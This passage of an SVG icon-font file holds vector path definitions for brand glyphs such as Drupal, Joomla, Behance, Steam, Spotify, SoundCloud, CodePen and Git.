c22.6006 2.5 32.7002 6.2998 59.5 6.2998c0.299805 -1.39941 0.900391 -3.19922 0.900391 -4.59961c0 -7.5 -49.4004 -12.5996 -58.4004 -14.0996z" />
    <glyph glyph-name="drupal" unicode="&#xf1a9;" 
d="M319.5 333.3c13.5 -8.2998 96.5 -67 96.5 -179.3c0 -112 -88.5 -186 -190.2 -186c-102 0 -193.8 80.2998 -193.8 189.5c0 109 85 167.5 100.8 175.8c18.7002 10.1006 32.2002 15.2998 53.5 32.2998c10.5 8.30078 19.2998 20.2002 22 49.5
c15.2002 -18.2998 33.5 -39.5 46.5 -48.2998c21.2002 -14 42.5 -19.5 64.7002 -33.5zM322 7.7002c4.2002 4.2002 1.90039 13.0996 -4.2002 8.5c-8.5 -6.2998 -27.5 -14 -54.5 -14c-34.5 0 -51.5 13.2998 -51.5 13.2998c-6.2002 0 -11.2998 -7.2002 -6.5 -12
c26.6006 -24.5 96.6006 -15.9004 116.7 4.2002zM267.5 60.2998c-6.5 -2.7002 -28.4004 -16.7998 -22.4004 -25c2.40039 -3.2998 5.2002 -1.2998 12.2002 4.7002c7.2002 5.7998 12 11 26.7002 11c25.2998 0 18.0996 -19.9004 26.5 -15.7002
c9.90039 4.90039 -2.09961 20.9004 -6.2002 23.7002c-7.7998 5.09961 -28.0996 4.90039 -36.7998 1.2998zM360 43c39.0996 -3.2998 64.5 106 15.7998 106c-20 0 -60.5 -41.5 -81.7998 -41.7998c-24.7002 -0.5 -59 49 -108.5 48.5
c-66.4004 -0.400391 -90.5996 -78.6006 -51.7998 -105.2c57.2002 -38.7002 130.399 42.9004 161.3 42c19.5 -0.700195 49.7998 -48.5 65 -49.5z" />
    <glyph glyph-name="joomla" unicode="&#xf1aa;" 
d="M0.599609 355.9c0 33.2998 26.8008 60.0996 59.8008 60.0996c30 0 54.5 -21.9004 59.1992 -50.2002c32.6006 7.60059 67.1006 -0.599609 96.5 -30l-44.2998 -44.2998c-20.5 20.5 -42.5996 16.2998 -55.3994 3.5c-14.3008 -14.2998 -14.3008 -37.9004 0 -52.2002
l99.5 -99.5l-44 -44.2998c-87.7002 87.2002 -49.7002 49.7002 -99.8008 99.7002c-26.7998 26.5 -35 64.7998 -24.7998 98.8994c-26.8994 5.80078 -46.7002 29.7002 -46.7002 58.3008zM130.1 239.5c28.5 28.4004 81.3008 80.7998 99.6006 99.9004
c26.5996 26.5996 64.5 35 98.2998 25.0996c4.09961 29.0996 29.2002 51.5996 59.5 51.5996c33 0 59.7998 -26.8994 59.7998 -60.0996c0 -30.2998 -22.7002 -55.4004 -51.8994 -59.5c9.59961 -33.5996 2.2998 -70 -28.9004 -101.2l-44 44.2998
c20.5 20.4004 16.2998 42.6006 3.5 55.4004c-14.2998 14.2998 -37.5996 14.2998 -51.9004 0c-10 -10.0996 -89.6992 -89.7998 -99.6992 -99.7998zM396.4 87.2998c29.0996 -4.09961 51.5996 -28.8994 51.5996 -59.0996c0 -33.2998 -26.7998 -60.1006 -59.7998 -60.1006
c-29.2002 0 -53.4004 20.7002 -58.9004 48.1006c-34.7002 -10.7998 -75.0996 -2.2002 -102.7 28l44 44.2998c20.4004 -20.5 42.6006 -16.2998 55.4004 -3.5c14.2998 14.2998 14.2998 37.5996 0 51.9004l-99.7002 99.6992l44.2998 44.3008
c104.5 -104.4 87.7002 -87.5 99.5 -99.7002c25.4004 -25.4004 34.5 -61.2002 26.3008 -93.9004zM312.1 140.4c-87.2998 -87.3008 -67.3994 -67.7002 -99.5 -99.7002c-25.6992 -25.4004 -61.5 -34.2002 -94.1992 -26c-6.10059 -26.9004 -30 -46.7002 -58.6006 -46.7002
c-33 0 -59.7998 26.7998 -59.7998 60.0996c0 28.3008 19.5 52.2002 46.2002 58.2002c-8.5 33.1006 -0.700195 68.1006 29.5 98.2998l44 -44.2998c-20.1006 -20.0996 -16.2998 -42 -3.2002 -55.3994c14.2998 -14.3008 37.5996 -14.3008 51.9004 0
c49.2998 49.3994 12.6992 13.3994 99.6992 99.7998z" />
    <glyph glyph-name="behance" unicode="&#xf1b4;" horiz-adv-x="576" 
d="M232 210.8c43.5996 -12.2998 64.7002 -45.2002 64.7002 -89.7002c0 -72 -60.5 -102.899 -124.9 -102.899h-171.8v354.399h167.1c60.7002 0 113.301 -17.1992 113.301 -87.7998c0 -35.7998 -16.6006 -58.7998 -48.4004 -74zM77.9004 312.1v-82.6992h79
c27.7998 0 47.5 12.0996 47.5 42.1992c0 32.6006 -25.3008 40.5 -53.4004 40.5h-73.0996zM161.2 78.4004c31.7002 0 57.5996 11.1992 57.5996 47c0 36.2998 -21.7002 50.5996 -56 50.5996h-84.8994v-97.5996h83.2998zM519.7 319.1h-143.7v34.9004h143.7v-34.9004zM576 142.8
c0 -4.5 -0.299805 -9 -0.599609 -13.2002h-185.101c0 -41.0996 21.7002 -65.2998 63 -65.2998c21.4004 0 49 11.6006 55.7002 33.5h62.2002c-19.1006 -58.7002 -58.7998 -86.2998 -120.101 -86.2998c-81 0 -131.3 54.7998 -131.3 134.7c0 77 53.1006 135.8 131.3 135.8
c80.5 0 124.9 -63.2998 124.9 -139.2zM390.4 174h114.699c-3 34 -20.7998 54.7998 -56.1992 54.7998c-33.8008 0 -56.2002 -21.0996 -58.5 -54.7998z" />
    <glyph glyph-name="behance-square" unicode="&#xf1b5;" 
d="M186.5 155c0 -19.2998 -14 -25.4004 -31.2002 -25.4004h-45.0996v52.9004h46c18.5996 -0.0996094 30.2998 -7.7998 30.2998 -27.5zM178.8 237.3c0 -16.2998 -10.7002 -22.8994 -25.7998 -22.8994h-42.7002v44.7998h39.6006c15.1992 0 28.8994 -4.2002 28.8994 -21.9004z
M311.1 214.1c19.2002 0 28.8008 -11.1992 30.5 -29.6992h-62.1992c1.19922 18.2998 13.3994 29.6992 31.6992 29.6992zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM271.7 263h77.7998
v18.9004h-77.7998v-18.9004zM228.7 152.7c0 24.0996 -11.4004 44.8994 -35 51.5996c17.2002 8.2002 26.2002 17.7002 26.2002 37c0 38.2002 -28.5 47.5 -61.4004 47.5h-90.5v-192h93.0996c34.9004 0.200195 67.6006 16.9004 67.6006 55.9004zM380 167.5
c0 41.0996 -24.0996 75.4004 -67.5996 75.4004c-42.4004 0 -71.1006 -31.8008 -71.1006 -73.6006c0 -43.2998 27.2998 -73 71.1006 -73c33.1992 0 54.6992 14.9004 65.0996 46.7998h-33.7002c-3.7002 -11.8994 -18.5996 -18.0996 -30.2002 -18.0996
c-22.3994 0 -34.0996 13.0996 -34.0996 35.2998h100.2c0.0996094 2.2998 0.299805 4.7998 0.299805 7.2002z" />
    <glyph glyph-name="steam" unicode="&#xf1b6;" horiz-adv-x="496" 
d="M496 192c0 -137 -111.2 -248 -248.4 -248c-113.8 0 -209.6 76.2998 -239 180.4l95.2002 -39.3008c6.40039 -32.0996 34.9004 -56.3994 68.9004 -56.3994c39.2002 0 71.8994 32.3994 70.2002 73.5l84.5 60.2002c52.0996 -1.30078 95.7998 40.8994 95.7998 93.5
c0 51.5996 -42 93.5 -93.7002 93.5s-93.7002 -42 -93.7002 -93.5v-1.2002l-59.2002 -85.7002c-15.5 0.900391 -30.6992 -3.40039 -43.5 -12.0996l-133.1 55c10.2002 127.699 117.1 228.1 247.6 228.1c137.2 0 248.4 -111 248.4 -248zM155.7 63.7002
c19.7998 -8.2002 42.5 1.09961 50.7998 21c8.2998 19.7998 -1.09961 42.5 -20.9004 50.7002l-31.5 13c12.2002 4.59961 26 4.7998 38.9004 -0.600586c13 -5.39941 23.0996 -15.5996 28.5 -28.5996s5.2998 -27.2998 -0.0996094 -40.2998
c-11.2002 -26.8008 -42.1006 -39.6006 -69 -28.4004c-10.2119 4.26953 -22.3975 15.8281 -27.2002 25.7998zM329.5 193.6c-34.4004 0 -62.4004 28 -62.4004 62.3008c0 34.2998 28 62.2998 62.4004 62.2998s62.4004 -28 62.4004 -62.2998
c0 -34.3008 -27.9004 -62.3008 -62.4004 -62.3008zM329.6 209.2c25.9004 0 46.9004 21 46.9004 46.7998c0 25.9004 -21 46.7998 -46.9004 46.7998c-25.8994 0 -46.8994 -21 -46.8994 -46.7998c0.0996094 -25.7998 21.0996 -46.7998 46.8994 -46.7998z" />
    <glyph glyph-name="steam-square" unicode="&#xf1b7;" 
d="M185.2 91.5c7.7002 18.5 -1 39.7002 -19.6006 47.4004l-29.5 12.1992c11.4004 4.30078 24.3008 4.5 36.4004 -0.5c12.2002 -5.09961 21.5996 -14.5996 26.7002 -26.6992c5 -12.2002 5 -25.6006 -0.100586 -37.7002c-10.5 -25.1006 -39.3994 -37 -64.5996 -26.5
c-11.5996 4.7998 -20.4004 13.5996 -25.4004 24.2002l28.5 -11.8008c18.6006 -7.7998 39.9004 0.900391 47.6006 19.4004zM400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v112.8l89.0996 -36.8994
c6 -30 32.7002 -52.7002 64.5 -52.7002c36.6006 0 67.3008 30.2998 65.7002 68.7998l79 56.2998c48.7002 -1.2002 89.6006 38.2998 89.6006 87.5c0 48.2002 -39.3008 87.5 -87.6006 87.5s-87.5996 -39.2998 -87.5996 -87.5v-1.09961l-55.4004 -80.2002
c-14.5 0.799805 -28.7002 -3.09961 -40.7002 -11.2998l-116.6 48.0996v160.7c0 26.5 21.5 48 48 48h352zM300.3 193.5c-32.2002 0 -58.3994 26.0996 -58.3994 58.2998s26.1992 58.2998 58.3994 58.2998s58.4004 -26.1992 58.4004 -58.2998
c0 -32.0996 -26.2002 -58.2998 -58.4004 -58.2998zM300.4 208.1c24.1992 0 43.8994 19.6006 43.8994 43.8008c0 24.1992 -19.5996 43.7998 -43.8994 43.7998c-24.2002 0 -43.9004 -19.6006 -43.9004 -43.7998c0 -24.2002 19.7002 -43.8008 43.9004 -43.8008z" />
    <glyph glyph-name="spotify" unicode="&#xf1bc;" horiz-adv-x="496" 
d="M248 440c136.9 0 248 -111.1 248 -248s-111.1 -248 -248 -248s-248 111.1 -248 248s111.1 248 248 248zM348.7 75.0996c8.09961 0 15.2002 6.30078 15.2002 15.4004s-3.60059 12.5996 -9.7002 16.5c-71.4004 42.7002 -155.101 44.2998 -237 26.2002
c-7.5 -1.60059 -13.6006 -6.5 -13.6006 -16.7998c0 -8.10059 6.10059 -15.8008 15.8008 -15.8008c2.89941 0 8 1.60059 11.8994 2.60059c71.7002 14.7002 144.3 13.0996 206.7 -24.5c3.90039 -2.2998 6.5 -3.60059 10.7002 -3.60059zM375.6 140.7
c10.9004 0 19.3008 8.7002 19.4004 19.5c0 8.7002 -3.2002 14.8994 -11.2998 19.7002c-49.4004 29.3994 -112.101 45.5 -177 45.5c-41.6006 0 -70 -5.80078 -97.7998 -13.6006c-10.3008 -2.89941 -15.5 -10 -15.5 -20.7002c0 -10.6992 8.69922 -19.3994 19.3994 -19.3994
c4.5 0 7.10059 1.2998 11.9004 2.59961c82.8994 22.5 176.1 7.60059 238.6 -29.3994c3.60059 -1.90039 7.10059 -4.2002 12.2998 -4.2002zM406.6 216.9c12.2002 0 23.2002 9.69922 23.2002 23.2998c0 11.8994 -5.09961 18.0996 -12.8994 22.5996
c-55.9004 32.6006 -132.4 47.7998 -205.4 47.7998c-42.9004 0 -82.2998 -4.89941 -117.5 -15.1992c-9 -2.60059 -17.4004 -10.3008 -17.4004 -23.9004c0 -13.2998 10.1006 -23.5996 23.3008 -23.5996c4.7998 0 9.2998 1.59961 12.8994 2.59961
c82.4004 23 209.7 12.7998 280.9 -29.7002c4.5 -2.59961 7.7002 -3.89941 12.8994 -3.89941z" />
    <glyph glyph-name="deviantart" unicode="&#xf1bd;" horiz-adv-x="320" 
d="M320 354.8l-98.2002 -179.1l7.40039 -9.5h90.7998v-127.7h-160.9l-13.5 -9.2002l-43.6992 -84c-0.300781 0 -8.60059 -8.59961 -9.2002 -9.2002h-92.7002v93.2002l93.2002 179.4l-7.40039 9.2002h-85.7998v127.6h156l13.5 9.2002l43.7002 84
c0.299805 0 8.59961 8.59961 9.2002 9.2002h97.5996v-93.1006z" />
    <glyph glyph-name="soundcloud" unicode="&#xf1be;" horiz-adv-x="639" 
d="M111.4 191.7l5.7998 -65l-5.7998 -68.2998c-0.300781 -2.5 -2.2002 -4.40039 -4.40039 -4.40039s-4.2002 1.90039 -4.2002 4.40039l-5.59961 68.2998l5.59961 65c0 2.2002 1.90039 4.2002 4.2002 4.2002c2.2002 0 4.09961 -2 4.40039 -4.2002zM132.8 237.3
c2.5 0 4.7002 -2.2002 4.7002 -5l5.7998 -105.6l-5.7998 -68.2998c0 -2.80078 -2.2002 -5 -4.7002 -5c-2.7998 0 -4.7002 2.19922 -5 5l-5 68.2998l5 105.6c0.299805 2.7998 2.2002 5 5 5zM158.3 261.4c2.7998 0 5.2998 -2.2002 5.2998 -5.30078l5.30078 -130
l-5.30078 -67.7998c0 -3.09961 -2.5 -5.2998 -5.2998 -5.2998c-3.09961 0 -5.2998 2.2002 -5.59961 5.2998l-4.40039 67.7998l4.40039 130c0.299805 3.10059 2.5 5.30078 5.59961 5.30078zM7.2002 164.8c1.39941 0 2.2002 -1.09961 2.5 -2.5l5.59961 -35.5996l-5.59961 -35
c-0.299805 -1.40039 -1.10059 -2.5 -2.5 -2.5c-1.40039 0 -2.2002 1.09961 -2.5 2.5l-4.7002 35l4.7002 35.5996c0.299805 1.40039 1.09961 2.5 2.5 2.5zM30.7998 186.7c1.40039 0 2.5 -1.10059 2.7998 -2.5l7.2002 -57.5l-7.2002 -56.4004
c-0.299805 -1.39941 -1.39941 -2.5 -2.7998 -2.5c-1.39941 0 -2.5 1.10059 -2.5 2.7998l-6.39941 56.1006l6.39941 57.5c0 1.39941 1.10059 2.5 2.5 2.5zM56.0996 198.1c1.7002 0 3.10059 -1.39941 3.10059 -3.2998l6.89941 -68.0996l-6.89941 -65.7998
c0 -1.7002 -1.40039 -3.10059 -3.10059 -3.10059c-1.59961 0 -3 1.40039 -3.2998 3.10059l-5.7998 65.7998l5.7998 68.0996c0.200195 1.90039 1.60059 3.2998 3.2998 3.2998zM81.4004 200.3c1.89941 0 3.59961 -1.39941 3.89941 -3.59961l6.40039 -70l-6.40039 -67.7998
c-0.299805 -2.2002 -2 -3.60059 -3.89941 -3.60059c-1.90039 0 -3.60059 1.40039 -3.60059 3.60059l-5.7998 67.7998l5.7998 70c0 2.2002 1.7002 3.59961 3.60059 3.59961zM322.8 311.2c2.5 -1.40039 4.10059 -4.2002 4.5 -7.2002l3.90039 -177.5l-3.90039 -64.2002
c0 -4.7002 -3.89941 -8.59961 -8.59961 -8.59961s-8.60059 3.89941 -8.90039 8.59961l-1.7002 31.7002l-1.69922 32.5l3.2998 176.7v0.799805c0.200195 2.5 1.39941 5 3.2998 6.7002c1.40039 1.09961 3.40039 1.89941 5.59961 1.89941
c1.40039 0 3.10059 -0.599609 4.2002 -1.39941zM296.1 295.9c2.2002 -1.40039 3.60059 -3.90039 3.90039 -6.7002l3.2998 -162.8l-3.09961 -58.6006l-0.299805 -6.7002c0 -2.2998 -0.800781 -4.19922 -2.5 -5.59961c-1.40039 -1.40039 -3.40039 -2.5 -5.60059 -2.5
c-2.5 0 -4.7002 1.2002 -6.39941 3.09961c-1.10059 1.40039 -1.7002 3 -1.7002 4.7002v0.299805c-3.10059 65.3008 -3.10059 65.6006 -3.10059 65.6006l2.80078 160.8l0.299805 1.7002c0 2.7998 1.39941 5.2998 3.59961 6.7002
c1.2998 0.799805 2.7998 1.39941 4.40039 1.39941c1.59961 0 3 -0.599609 4.39941 -1.39941zM184.7 273.4c3.39941 0 5.89941 -2.80078 6.09961 -6.10059l5 -140.6l-5 -67.2002c-0.299805 -3.2998 -2.7998 -5.7998 -6.09961 -5.7998c-3 0 -5.5 2.5 -5.7998 5.7998
l-4.40039 67.2002l4.40039 140.6c0 3.2998 2.69922 6.10059 5.7998 6.10059zM561.4 210.6c43.2998 0 78.5996 -35.2998 78.5 -78.8994c0 -43.2998 -35.3008 -78.2998 -78.6006 -78.2998h-218.3c-4.7002 0.599609 -8.59961 4.19922 -8.59961 9.19922v249.7
c0 4.7998 1.69922 7 7.7998 9.2002c15.2998 6.09961 32.5 9.40039 50.2998 9.40039c72.5 0 131.9 -55.6006 138.3 -126.4c9.5 3.90039 19.7998 6.09961 30.6006 6.09961zM264.7 270.9c4.2002 0 7.2002 -3.30078 7.5 -7.80078l3.89941 -136.699l-3.89941 -65.6006
c0 -4.2002 -3.2998 -7.5 -7.5 -7.5s-7.5 3.2998 -7.7998 7.5l-3.30078 65.6006l3.30078 136.699c0.299805 4.5 3.59961 7.80078 7.7998 7.80078zM211.1 278.7c3.60059 0 6.40039 -3.10059 6.7002 -6.7002l4.40039 -145.3l-4.40039 -66.9004
c-0.299805 -3.59961 -3.09961 -6.39941 -6.7002 -6.39941c-3.2998 0 -6.09961 2.7998 -6.39941 6.39941l-3.90039 66.9004l3.90039 145.3c0 3.59961 3.09961 6.7002 6.39941 6.7002zM237.8 275.3c3.90039 0 6.90039 -3 6.90039 -6.89941l4.2002 -141.7l-4.2002 -66.4004
c0 -3.7998 -3.10059 -6.89941 -6.90039 -6.89941s-6.59961 3 -6.89941 6.89941l-3.90039 66.4004l3.90039 141.7c0 3.7998 3 6.89941 6.89941 6.89941z" />
    <glyph glyph-name="vine" unicode="&#xf1ca;" horiz-adv-x="384" 
d="M384 193.3v-52.0996c-18.4004 -4.2002 -36.9004 -6.10059 -52.0996 -6.10059c-36.9004 -77.3994 -103 -143.8 -125.101 -156.199c-14 -7.90039 -27.0996 -8.40039 -42.7002 0.799805c-27.0996 16.2998 -129.899 100.6 -164.1 365.6h74.5
c18.7002 -159.1 64.5 -240.7 114.8 -301.8c27.9004 27.9004 54.7998 65.0996 75.6006 106.9c-49.8008 25.2998 -80.1006 80.8994 -80.1006 145.6c0 65.5996 37.7002 115.1 102.2 115.1c114.9 0 106.2 -127.899 81.5996 -181.5c0 0 -46.3994 -9.19922 -63.5 20.5
c3.40039 11.3008 8.2002 30.8008 8.2002 48.5c0 31.3008 -11.2998 46.6006 -28.3994 46.6006c-18.2002 0 -30.8008 -17.1006 -30.8008 -50c0.100586 -79.2002 59.4004 -118.7 129.9 -101.9z" />
    <glyph glyph-name="codepen" unicode="&#xf1cb;" horiz-adv-x="512" 
d="M502.285 288.296c6.00098 -3.99902 9.71484 -11.1426 9.71582 -18.2852v-155.999c0 -7.14258 -3.71484 -14.2871 -9.71484 -18.2861l-234 -156.021c-8.06055 -4.95996 -16.584 -4.91504 -24.5713 0l-234 156.021c-6.00098 4 -9.71484 11.1436 -9.71484 18.2861v155.999
c0 7.14258 3.71387 14.2861 9.71387 18.2852l234 156c8.06055 4.95996 16.584 4.91504 24.5713 0zM278 384.869v-102.572l95.4287 -63.7148l76.8574 51.4287zM234 384.869l-172.286 -114.858l76.8574 -51.4287l95.4287 63.7148v102.572zM44 228.868v-73.7139
l55.1426 36.8564zM234 -0.84668v102.571l-95.4287 63.7158l-76.8574 -51.4297zM256 140.011l77.7148 52l-77.7148 52l-77.7148 -52zM278 -0.84668l172.286 114.857l-76.8574 51.4297l-95.4287 -63.7158v-102.571zM468 155.154v73.7139l-55.1426 -36.8574z" />
    <glyph glyph-name="jsfiddle" unicode="&#xf1cc;" horiz-adv-x="575" 
d="M510.634 210.538c45.6885 -25.334 68.3721 -74.5605 56.832 -122.634c-12.1035 -50.4199 -55.5479 -86.6592 -108.212 -87.293c-84.0303 -1.01172 -168.079 -0.458984 -252.12 -0.480469c-30.3223 -0.00683594 -60.668 -0.492188 -90.959 0.539062
c-48.0938 1.63672 -91.7764 35.8643 -105.607 81.4326c-14.1289 46.5508 2.18945 94.623 41.9014 124.615c2.54688 1.92383 4.86914 6.52051 4.51465 9.54492c-3.74609 31.8604 7.14453 57.6709 32.6758 76.4082c26.2822 19.2881 55.2285 21.5879 85.3311 9.16699
c2.36621 -0.975586 4.63965 -2.17773 7.82422 -3.68555c16.5215 27.5332 38.1221 48.6523 65.4922 63.9023c92.8594 51.7402 210.954 8.31152 246.85 -91.6455c5.55762 -15.4766 6.74512 -32.6074 9.09668 -49.0947c0.716797 -5.02832 1.6543 -8.15527 6.38086 -10.7764z
M531.741 53.6582c39.3135 48.375 22.418 117.668 -35.1426 144.497c-7.43555 3.46582 -9.72559 7.74414 -9.84766 15.8936c-1.87012 125.129 -132.78 187.063 -230.24 132.697c-26.1133 -14.5674 -46.4492 -34.8955 -60.6709 -61.2939
c-7.59082 -14.0908 -11.9287 -7.97754 -22.1982 -2.52734c-24.6113 13.0635 -49.0469 12.6406 -72.0332 -3.08301c-21.9678 -15.0244 -31.9102 -36.6201 -26.4199 -62.9805c2.4082 -11.5703 -0.914062 -17.0635 -10.0967 -23.1367
c-38.1895 -25.2578 -53.0879 -74.8604 -34.1855 -116.105c18.4355 -40.2295 51.3135 -59.6631 95.1748 -59.9951c0.700195 -0.00488281 163.728 -0.545898 163.728 0.154297c56.8857 0 113.778 -0.551758 170.652 0.229492
c28.9375 0.397461 53.0498 13.2178 71.2803 35.6504zM443.952 134.157c-5.84863 -31.1572 -34.6221 -55.0967 -66.666 -55.0957c-16.9531 0.00195312 -32.0586 6.5459 -44.0791 17.7051c-27.6973 25.7139 -71.1406 74.9805 -95.9375 93.3877
c-20.0557 14.8877 -41.9893 12.333 -60.2715 -3.78223c-49.9961 -44.0713 15.8594 -121.775 67.0625 -77.1885c4.54883 3.95996 7.84082 9.54297 12.7441 12.8447c8.18457 5.50879 20.7666 0.883789 13.168 -10.6221c-17.3574 -26.2842 -49.3301 -38.1973 -78.8623 -29.3008
c-28.8975 8.70312 -48.8408 35.9678 -48.626 70.1787c1.22461 22.4844 12.3633 43.0596 35.4141 55.9648c22.5742 12.6377 46.3682 13.1455 66.9902 -2.47363c50.791 -38.4756 75.5781 -81.7451 107.296 -101.245c24.5586 -15.0996 54.2549 -7.36328 68.8232 17.5059
c28.8301 49.209 -34.5918 105.016 -78.8682 63.46c-3.98828 -3.74414 -6.91699 -8.93164 -11.4092 -11.7197c-10.9756 -6.81152 -17.333 4.1123 -12.8096 10.3525c20.7031 28.5537 50.4639 40.4404 83.2715 28.2139c31.4287 -11.7139 49.1074 -44.3662 42.7598 -78.1855z
" />
    <glyph glyph-name="rebel" unicode="&#xf1d0;" horiz-adv-x="512" 
d="M256.5 -56c-139.3 0 -247.5 116.2 -243.3 254.1c2.7998 79.2002 43.2002 152.2 116.5 200.4c0.299805 0 1.89941 0.599609 1.09961 -0.799805c-5.7998 -5.5 -111.3 -129.8 -14.0996 -226.4c49.7998 -49.5 90 -2.5 90 -2.5c38.5 50.1006 -0.600586 125.9 -0.600586 125.9
c-10 24.8994 -45.6992 40.0996 -45.6992 40.0996l28.7998 31.7998c24.3994 -10.5 43.2002 -38.6992 43.2002 -38.6992c0.799805 29.5996 -21.9004 61.3994 -21.9004 61.3994l44.5996 50.7002l44.3008 -50.0996c-20.5 -28.8008 -21.9004 -62.6006 -21.9004 -62.6006
c13.7998 23 43.5 39.2998 43.5 39.2998l28.5 -31.7998c-27.4004 -8.89941 -45.4004 -39.8994 -45.4004 -39.8994c-15.7998 -28.5 -27.0996 -89.4004 0.600586 -127.301c32.3994 -44.5996 87.7002 2.80078 87.7002 2.80078c102.699 91.8994 -10.5 225 -10.5 225
c-6.10059 5.5 0.799805 2.7998 0.799805 2.7998c50.0996 -36.5 114.6 -84.4004 116.2 -204.8c2 -145.601 -99.9004 -249.4 -242.4 -249.4z" />
    <glyph glyph-name="empire" unicode="&#xf1d1;" horiz-adv-x="496" 
d="M287.6 393.8c-10.7998 2.2002 -22.0996 3.2998 -33.5 3.60059v18.1992c78.1006 -2.19922 146.101 -44 184.601 -106.6l-15.7998 -9.09961c-6.10059 9.69922 -12.7002 18.7998 -20.2002 27.0996l-18 -15.5c-26 29.5996 -61.4004 50.7002 -101.9 58.4004zM53.4004 125.6
c3.89941 -10.7998 8.2998 -21.0996 13.5996 -31.0996l-15.7998 -9.09961c-17.1006 31.5996 -27.1006 68.0996 -27.1006 106.6s9.90039 75 27.1006 106.5l15.7998 -9.09961c-5.2998 -9.7002 -10 -20.2002 -13.5996 -31l22.6992 -7.7002
c-6.39941 -18.2998 -9.69922 -38.2002 -9.69922 -58.7002s3.59961 -40.4004 10 -58.7002zM213.1 14l-4.69922 -23.7998c10.7998 -1.90039 22.1992 -3.2998 33.5 -3.60059v-18.2998c-78.1006 2.2998 -146.4 44.2998 -184.9 106.601l16 9.39941
c5.7998 -9.7002 12.7002 -18.7998 20.2002 -27.3994l18 15.7998c26.0996 -29.6006 61.5 -50.7002 101.899 -58.7002zM93.2998 327.1c-7.5 -8.2998 -14.0996 -17.5 -20.0996 -27.1992l-15.7998 9.09961c38.5 62.5996 106.5 104.4 184.6 106.6v-18.1992
c-11.4004 -0.300781 -22.7002 -1.40039 -33.5 -3.60059l4.7002 -23.7998c-40.5 -7.7002 -75.9004 -28.7998 -101.9 -58.4004zM402.7 56.9004c7.5 8.59961 14.3994 17.6992 20.0996 27.3994l16.1006 -9.39941c-38.5 -62.3008 -106.801 -104.4 -184.9 -106.601v18.2998
c11.4004 0.300781 22.7002 1.7002 33.5 3.60059l-4.7002 23.7998c40.5 8 75.9004 29.0996 101.9 58.7002zM496 192c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248s248 -111 248 -248zM483.8 192c0 130.1 -105.7 235.8 -235.8 235.8
s-235.8 -105.7 -235.8 -235.8s105.7 -235.8 235.8 -235.8s235.8 105.7 235.8 235.8zM444.8 298.6c17.2002 -31.5996 27.1006 -68.0996 27.1006 -106.6s-9.90039 -75 -27.1006 -106.4l-15.7998 9.10059c5.2998 10 9.7002 20.2002 13.5996 31l-23 7.7002
c6.40039 18.2998 10 38.1992 10 58.6992s-3.2998 40.4004 -9.69922 58.7002l22.6992 7.7002c-3.59961 10.7998 -8.2998 21.2998 -13.5996 31zM261.8 120.9l13.2998 -66.7002c-8.59961 -1.7002 -17.6992 -2.7998 -27.0996 -2.7998s-18.5 1.09961 -27.0996 2.7998
l13.2998 66.7002c-16.2998 3.2998 -30.5 11.5996 -40.7002 23.5l-51.2002 -44.8008c-11.8994 13.6006 -21.2998 29.4004 -27.0996 46.8008l64.2002 22.0996c-2.5 7.40039 -3.90039 15.2002 -3.90039 23.5s1.40039 16 3.90039 23.5l-64.5 22.0996
c6.09961 17.5 15.5 33.2002 27.3994 46.8008l51.2002 -44.8008c10.2998 11.9004 24.4004 20.5 40.7002 23.8008l-13.2998 66.3994c8.59961 2 17.6992 2.7998 27.0996 2.7998s18.5 -0.899414 27.0996 -2.7998l-13.2998 -66.3994
c16.2998 -3.30078 30.5 -11.9004 40.7002 -23.8008l51.2002 44.8008c11.8994 -13.6006 21.2998 -29.4004 27.3994 -46.8008l-64.5 -22.0996c2.5 -7.40039 3.90039 -15.2002 3.90039 -23.5s-1.40039 -16 -3.90039 -23.5l64.2002 -22.0996
c-5.7998 -17.5 -15.2002 -33.2002 -27.0996 -46.8008l-51.2002 44.8008c-10.2998 -11.9004 -24.4004 -20.2002 -40.7002 -23.5z" />
    <glyph glyph-name="git-square" unicode="&#xf1d2;" 
d="M140.1 99.5c12.1006 0 29.5 -2.09961 29.5 -17.9004c0 -15.5 -13.8994 -18.7998 -27 -18.7998c-12.2998 0 -30.8994 2 -30.8994 18s15.7002 18.7002 28.3994 18.7002zM115.4 216.1c0 35.2002 43.5996 34.8008 43.5 0.400391c0 -14.5 -5.7002 -24.5 -21.2002 -24.5
c-15.7002 0 -22.2998 9.2998 -22.2998 24.0996zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM207 274.3c-12.2998 -4.7998 -25.5 -8.39941 -38.9004 -8.39941
c-38.5 22.0996 -90.6992 -0.900391 -90.6992 -49.5c0 -18 11.5996 -42.9004 29.5996 -48.9004v-0.700195c-13.4004 -5.89941 -17.0996 -36.0996 0.700195 -47v-0.700195c-19.5 -6.39941 -32.2998 -18.7998 -32.2998 -40.1992c0 -36.8008 34.7998 -47 65.3994 -47
c37.1006 0 64.7998 13.3994 64.7998 54.2998c0 50.3994 -72.0996 31.7998 -72.0996 59.0996c0 9.60059 5.2002 13.4004 14.0996 15.2002c29.6006 5.5 48.2002 28.5996 48.2002 58.7002c0 5.2002 -1.09961 10.2002 -2.89941 15c4.7998 1.09961 9.5 2.2998 14.0996 3.89941
v36.2002zM263.8 272.5h-39.5996c1.2998 -10.5996 1.09961 -142.6 0 -155.5h39.5996c-1.09961 12.7998 -1.2002 145.1 0 155.5zM268.3 325.8c0 13.4004 -10 26.2002 -24.0996 26.2002c-14.2998 0 -24.6006 -12.5 -24.6006 -26.2002
c0 -13.5996 10.5 -25.8994 24.6006 -25.8994c13.7002 0 24.0996 12.5 24.0996 25.8994zM372.6 272.5h-36.3994c0 9.7998 -0.400391 19.5996 1.09961 29.5h-40.5c1.2998 -7.2998 1.10059 -13.5996 1.10059 -29.5h-17.1006v-33.9004
c11.9004 1.90039 12.1006 0.700195 17.1006 0.700195v-0.700195h-0.400391v-62.6992c0 -31.1006 4.5 -61.2002 42.7002 -61.2002c10.7002 0 23 1.7998 32.5 7v35c-5.7002 -3.90039 -13.9004 -5.90039 -20.9004 -5.90039c-13.2002 0 -15.5 12.9004 -15.5 23.4004v65.2002
c22.7002 0 36.4004 -0.700195 36.4004 -0.700195v33.7998h-0.100586z" />
    <glyph glyph-name="git" unicode="&#xf1d3;" 
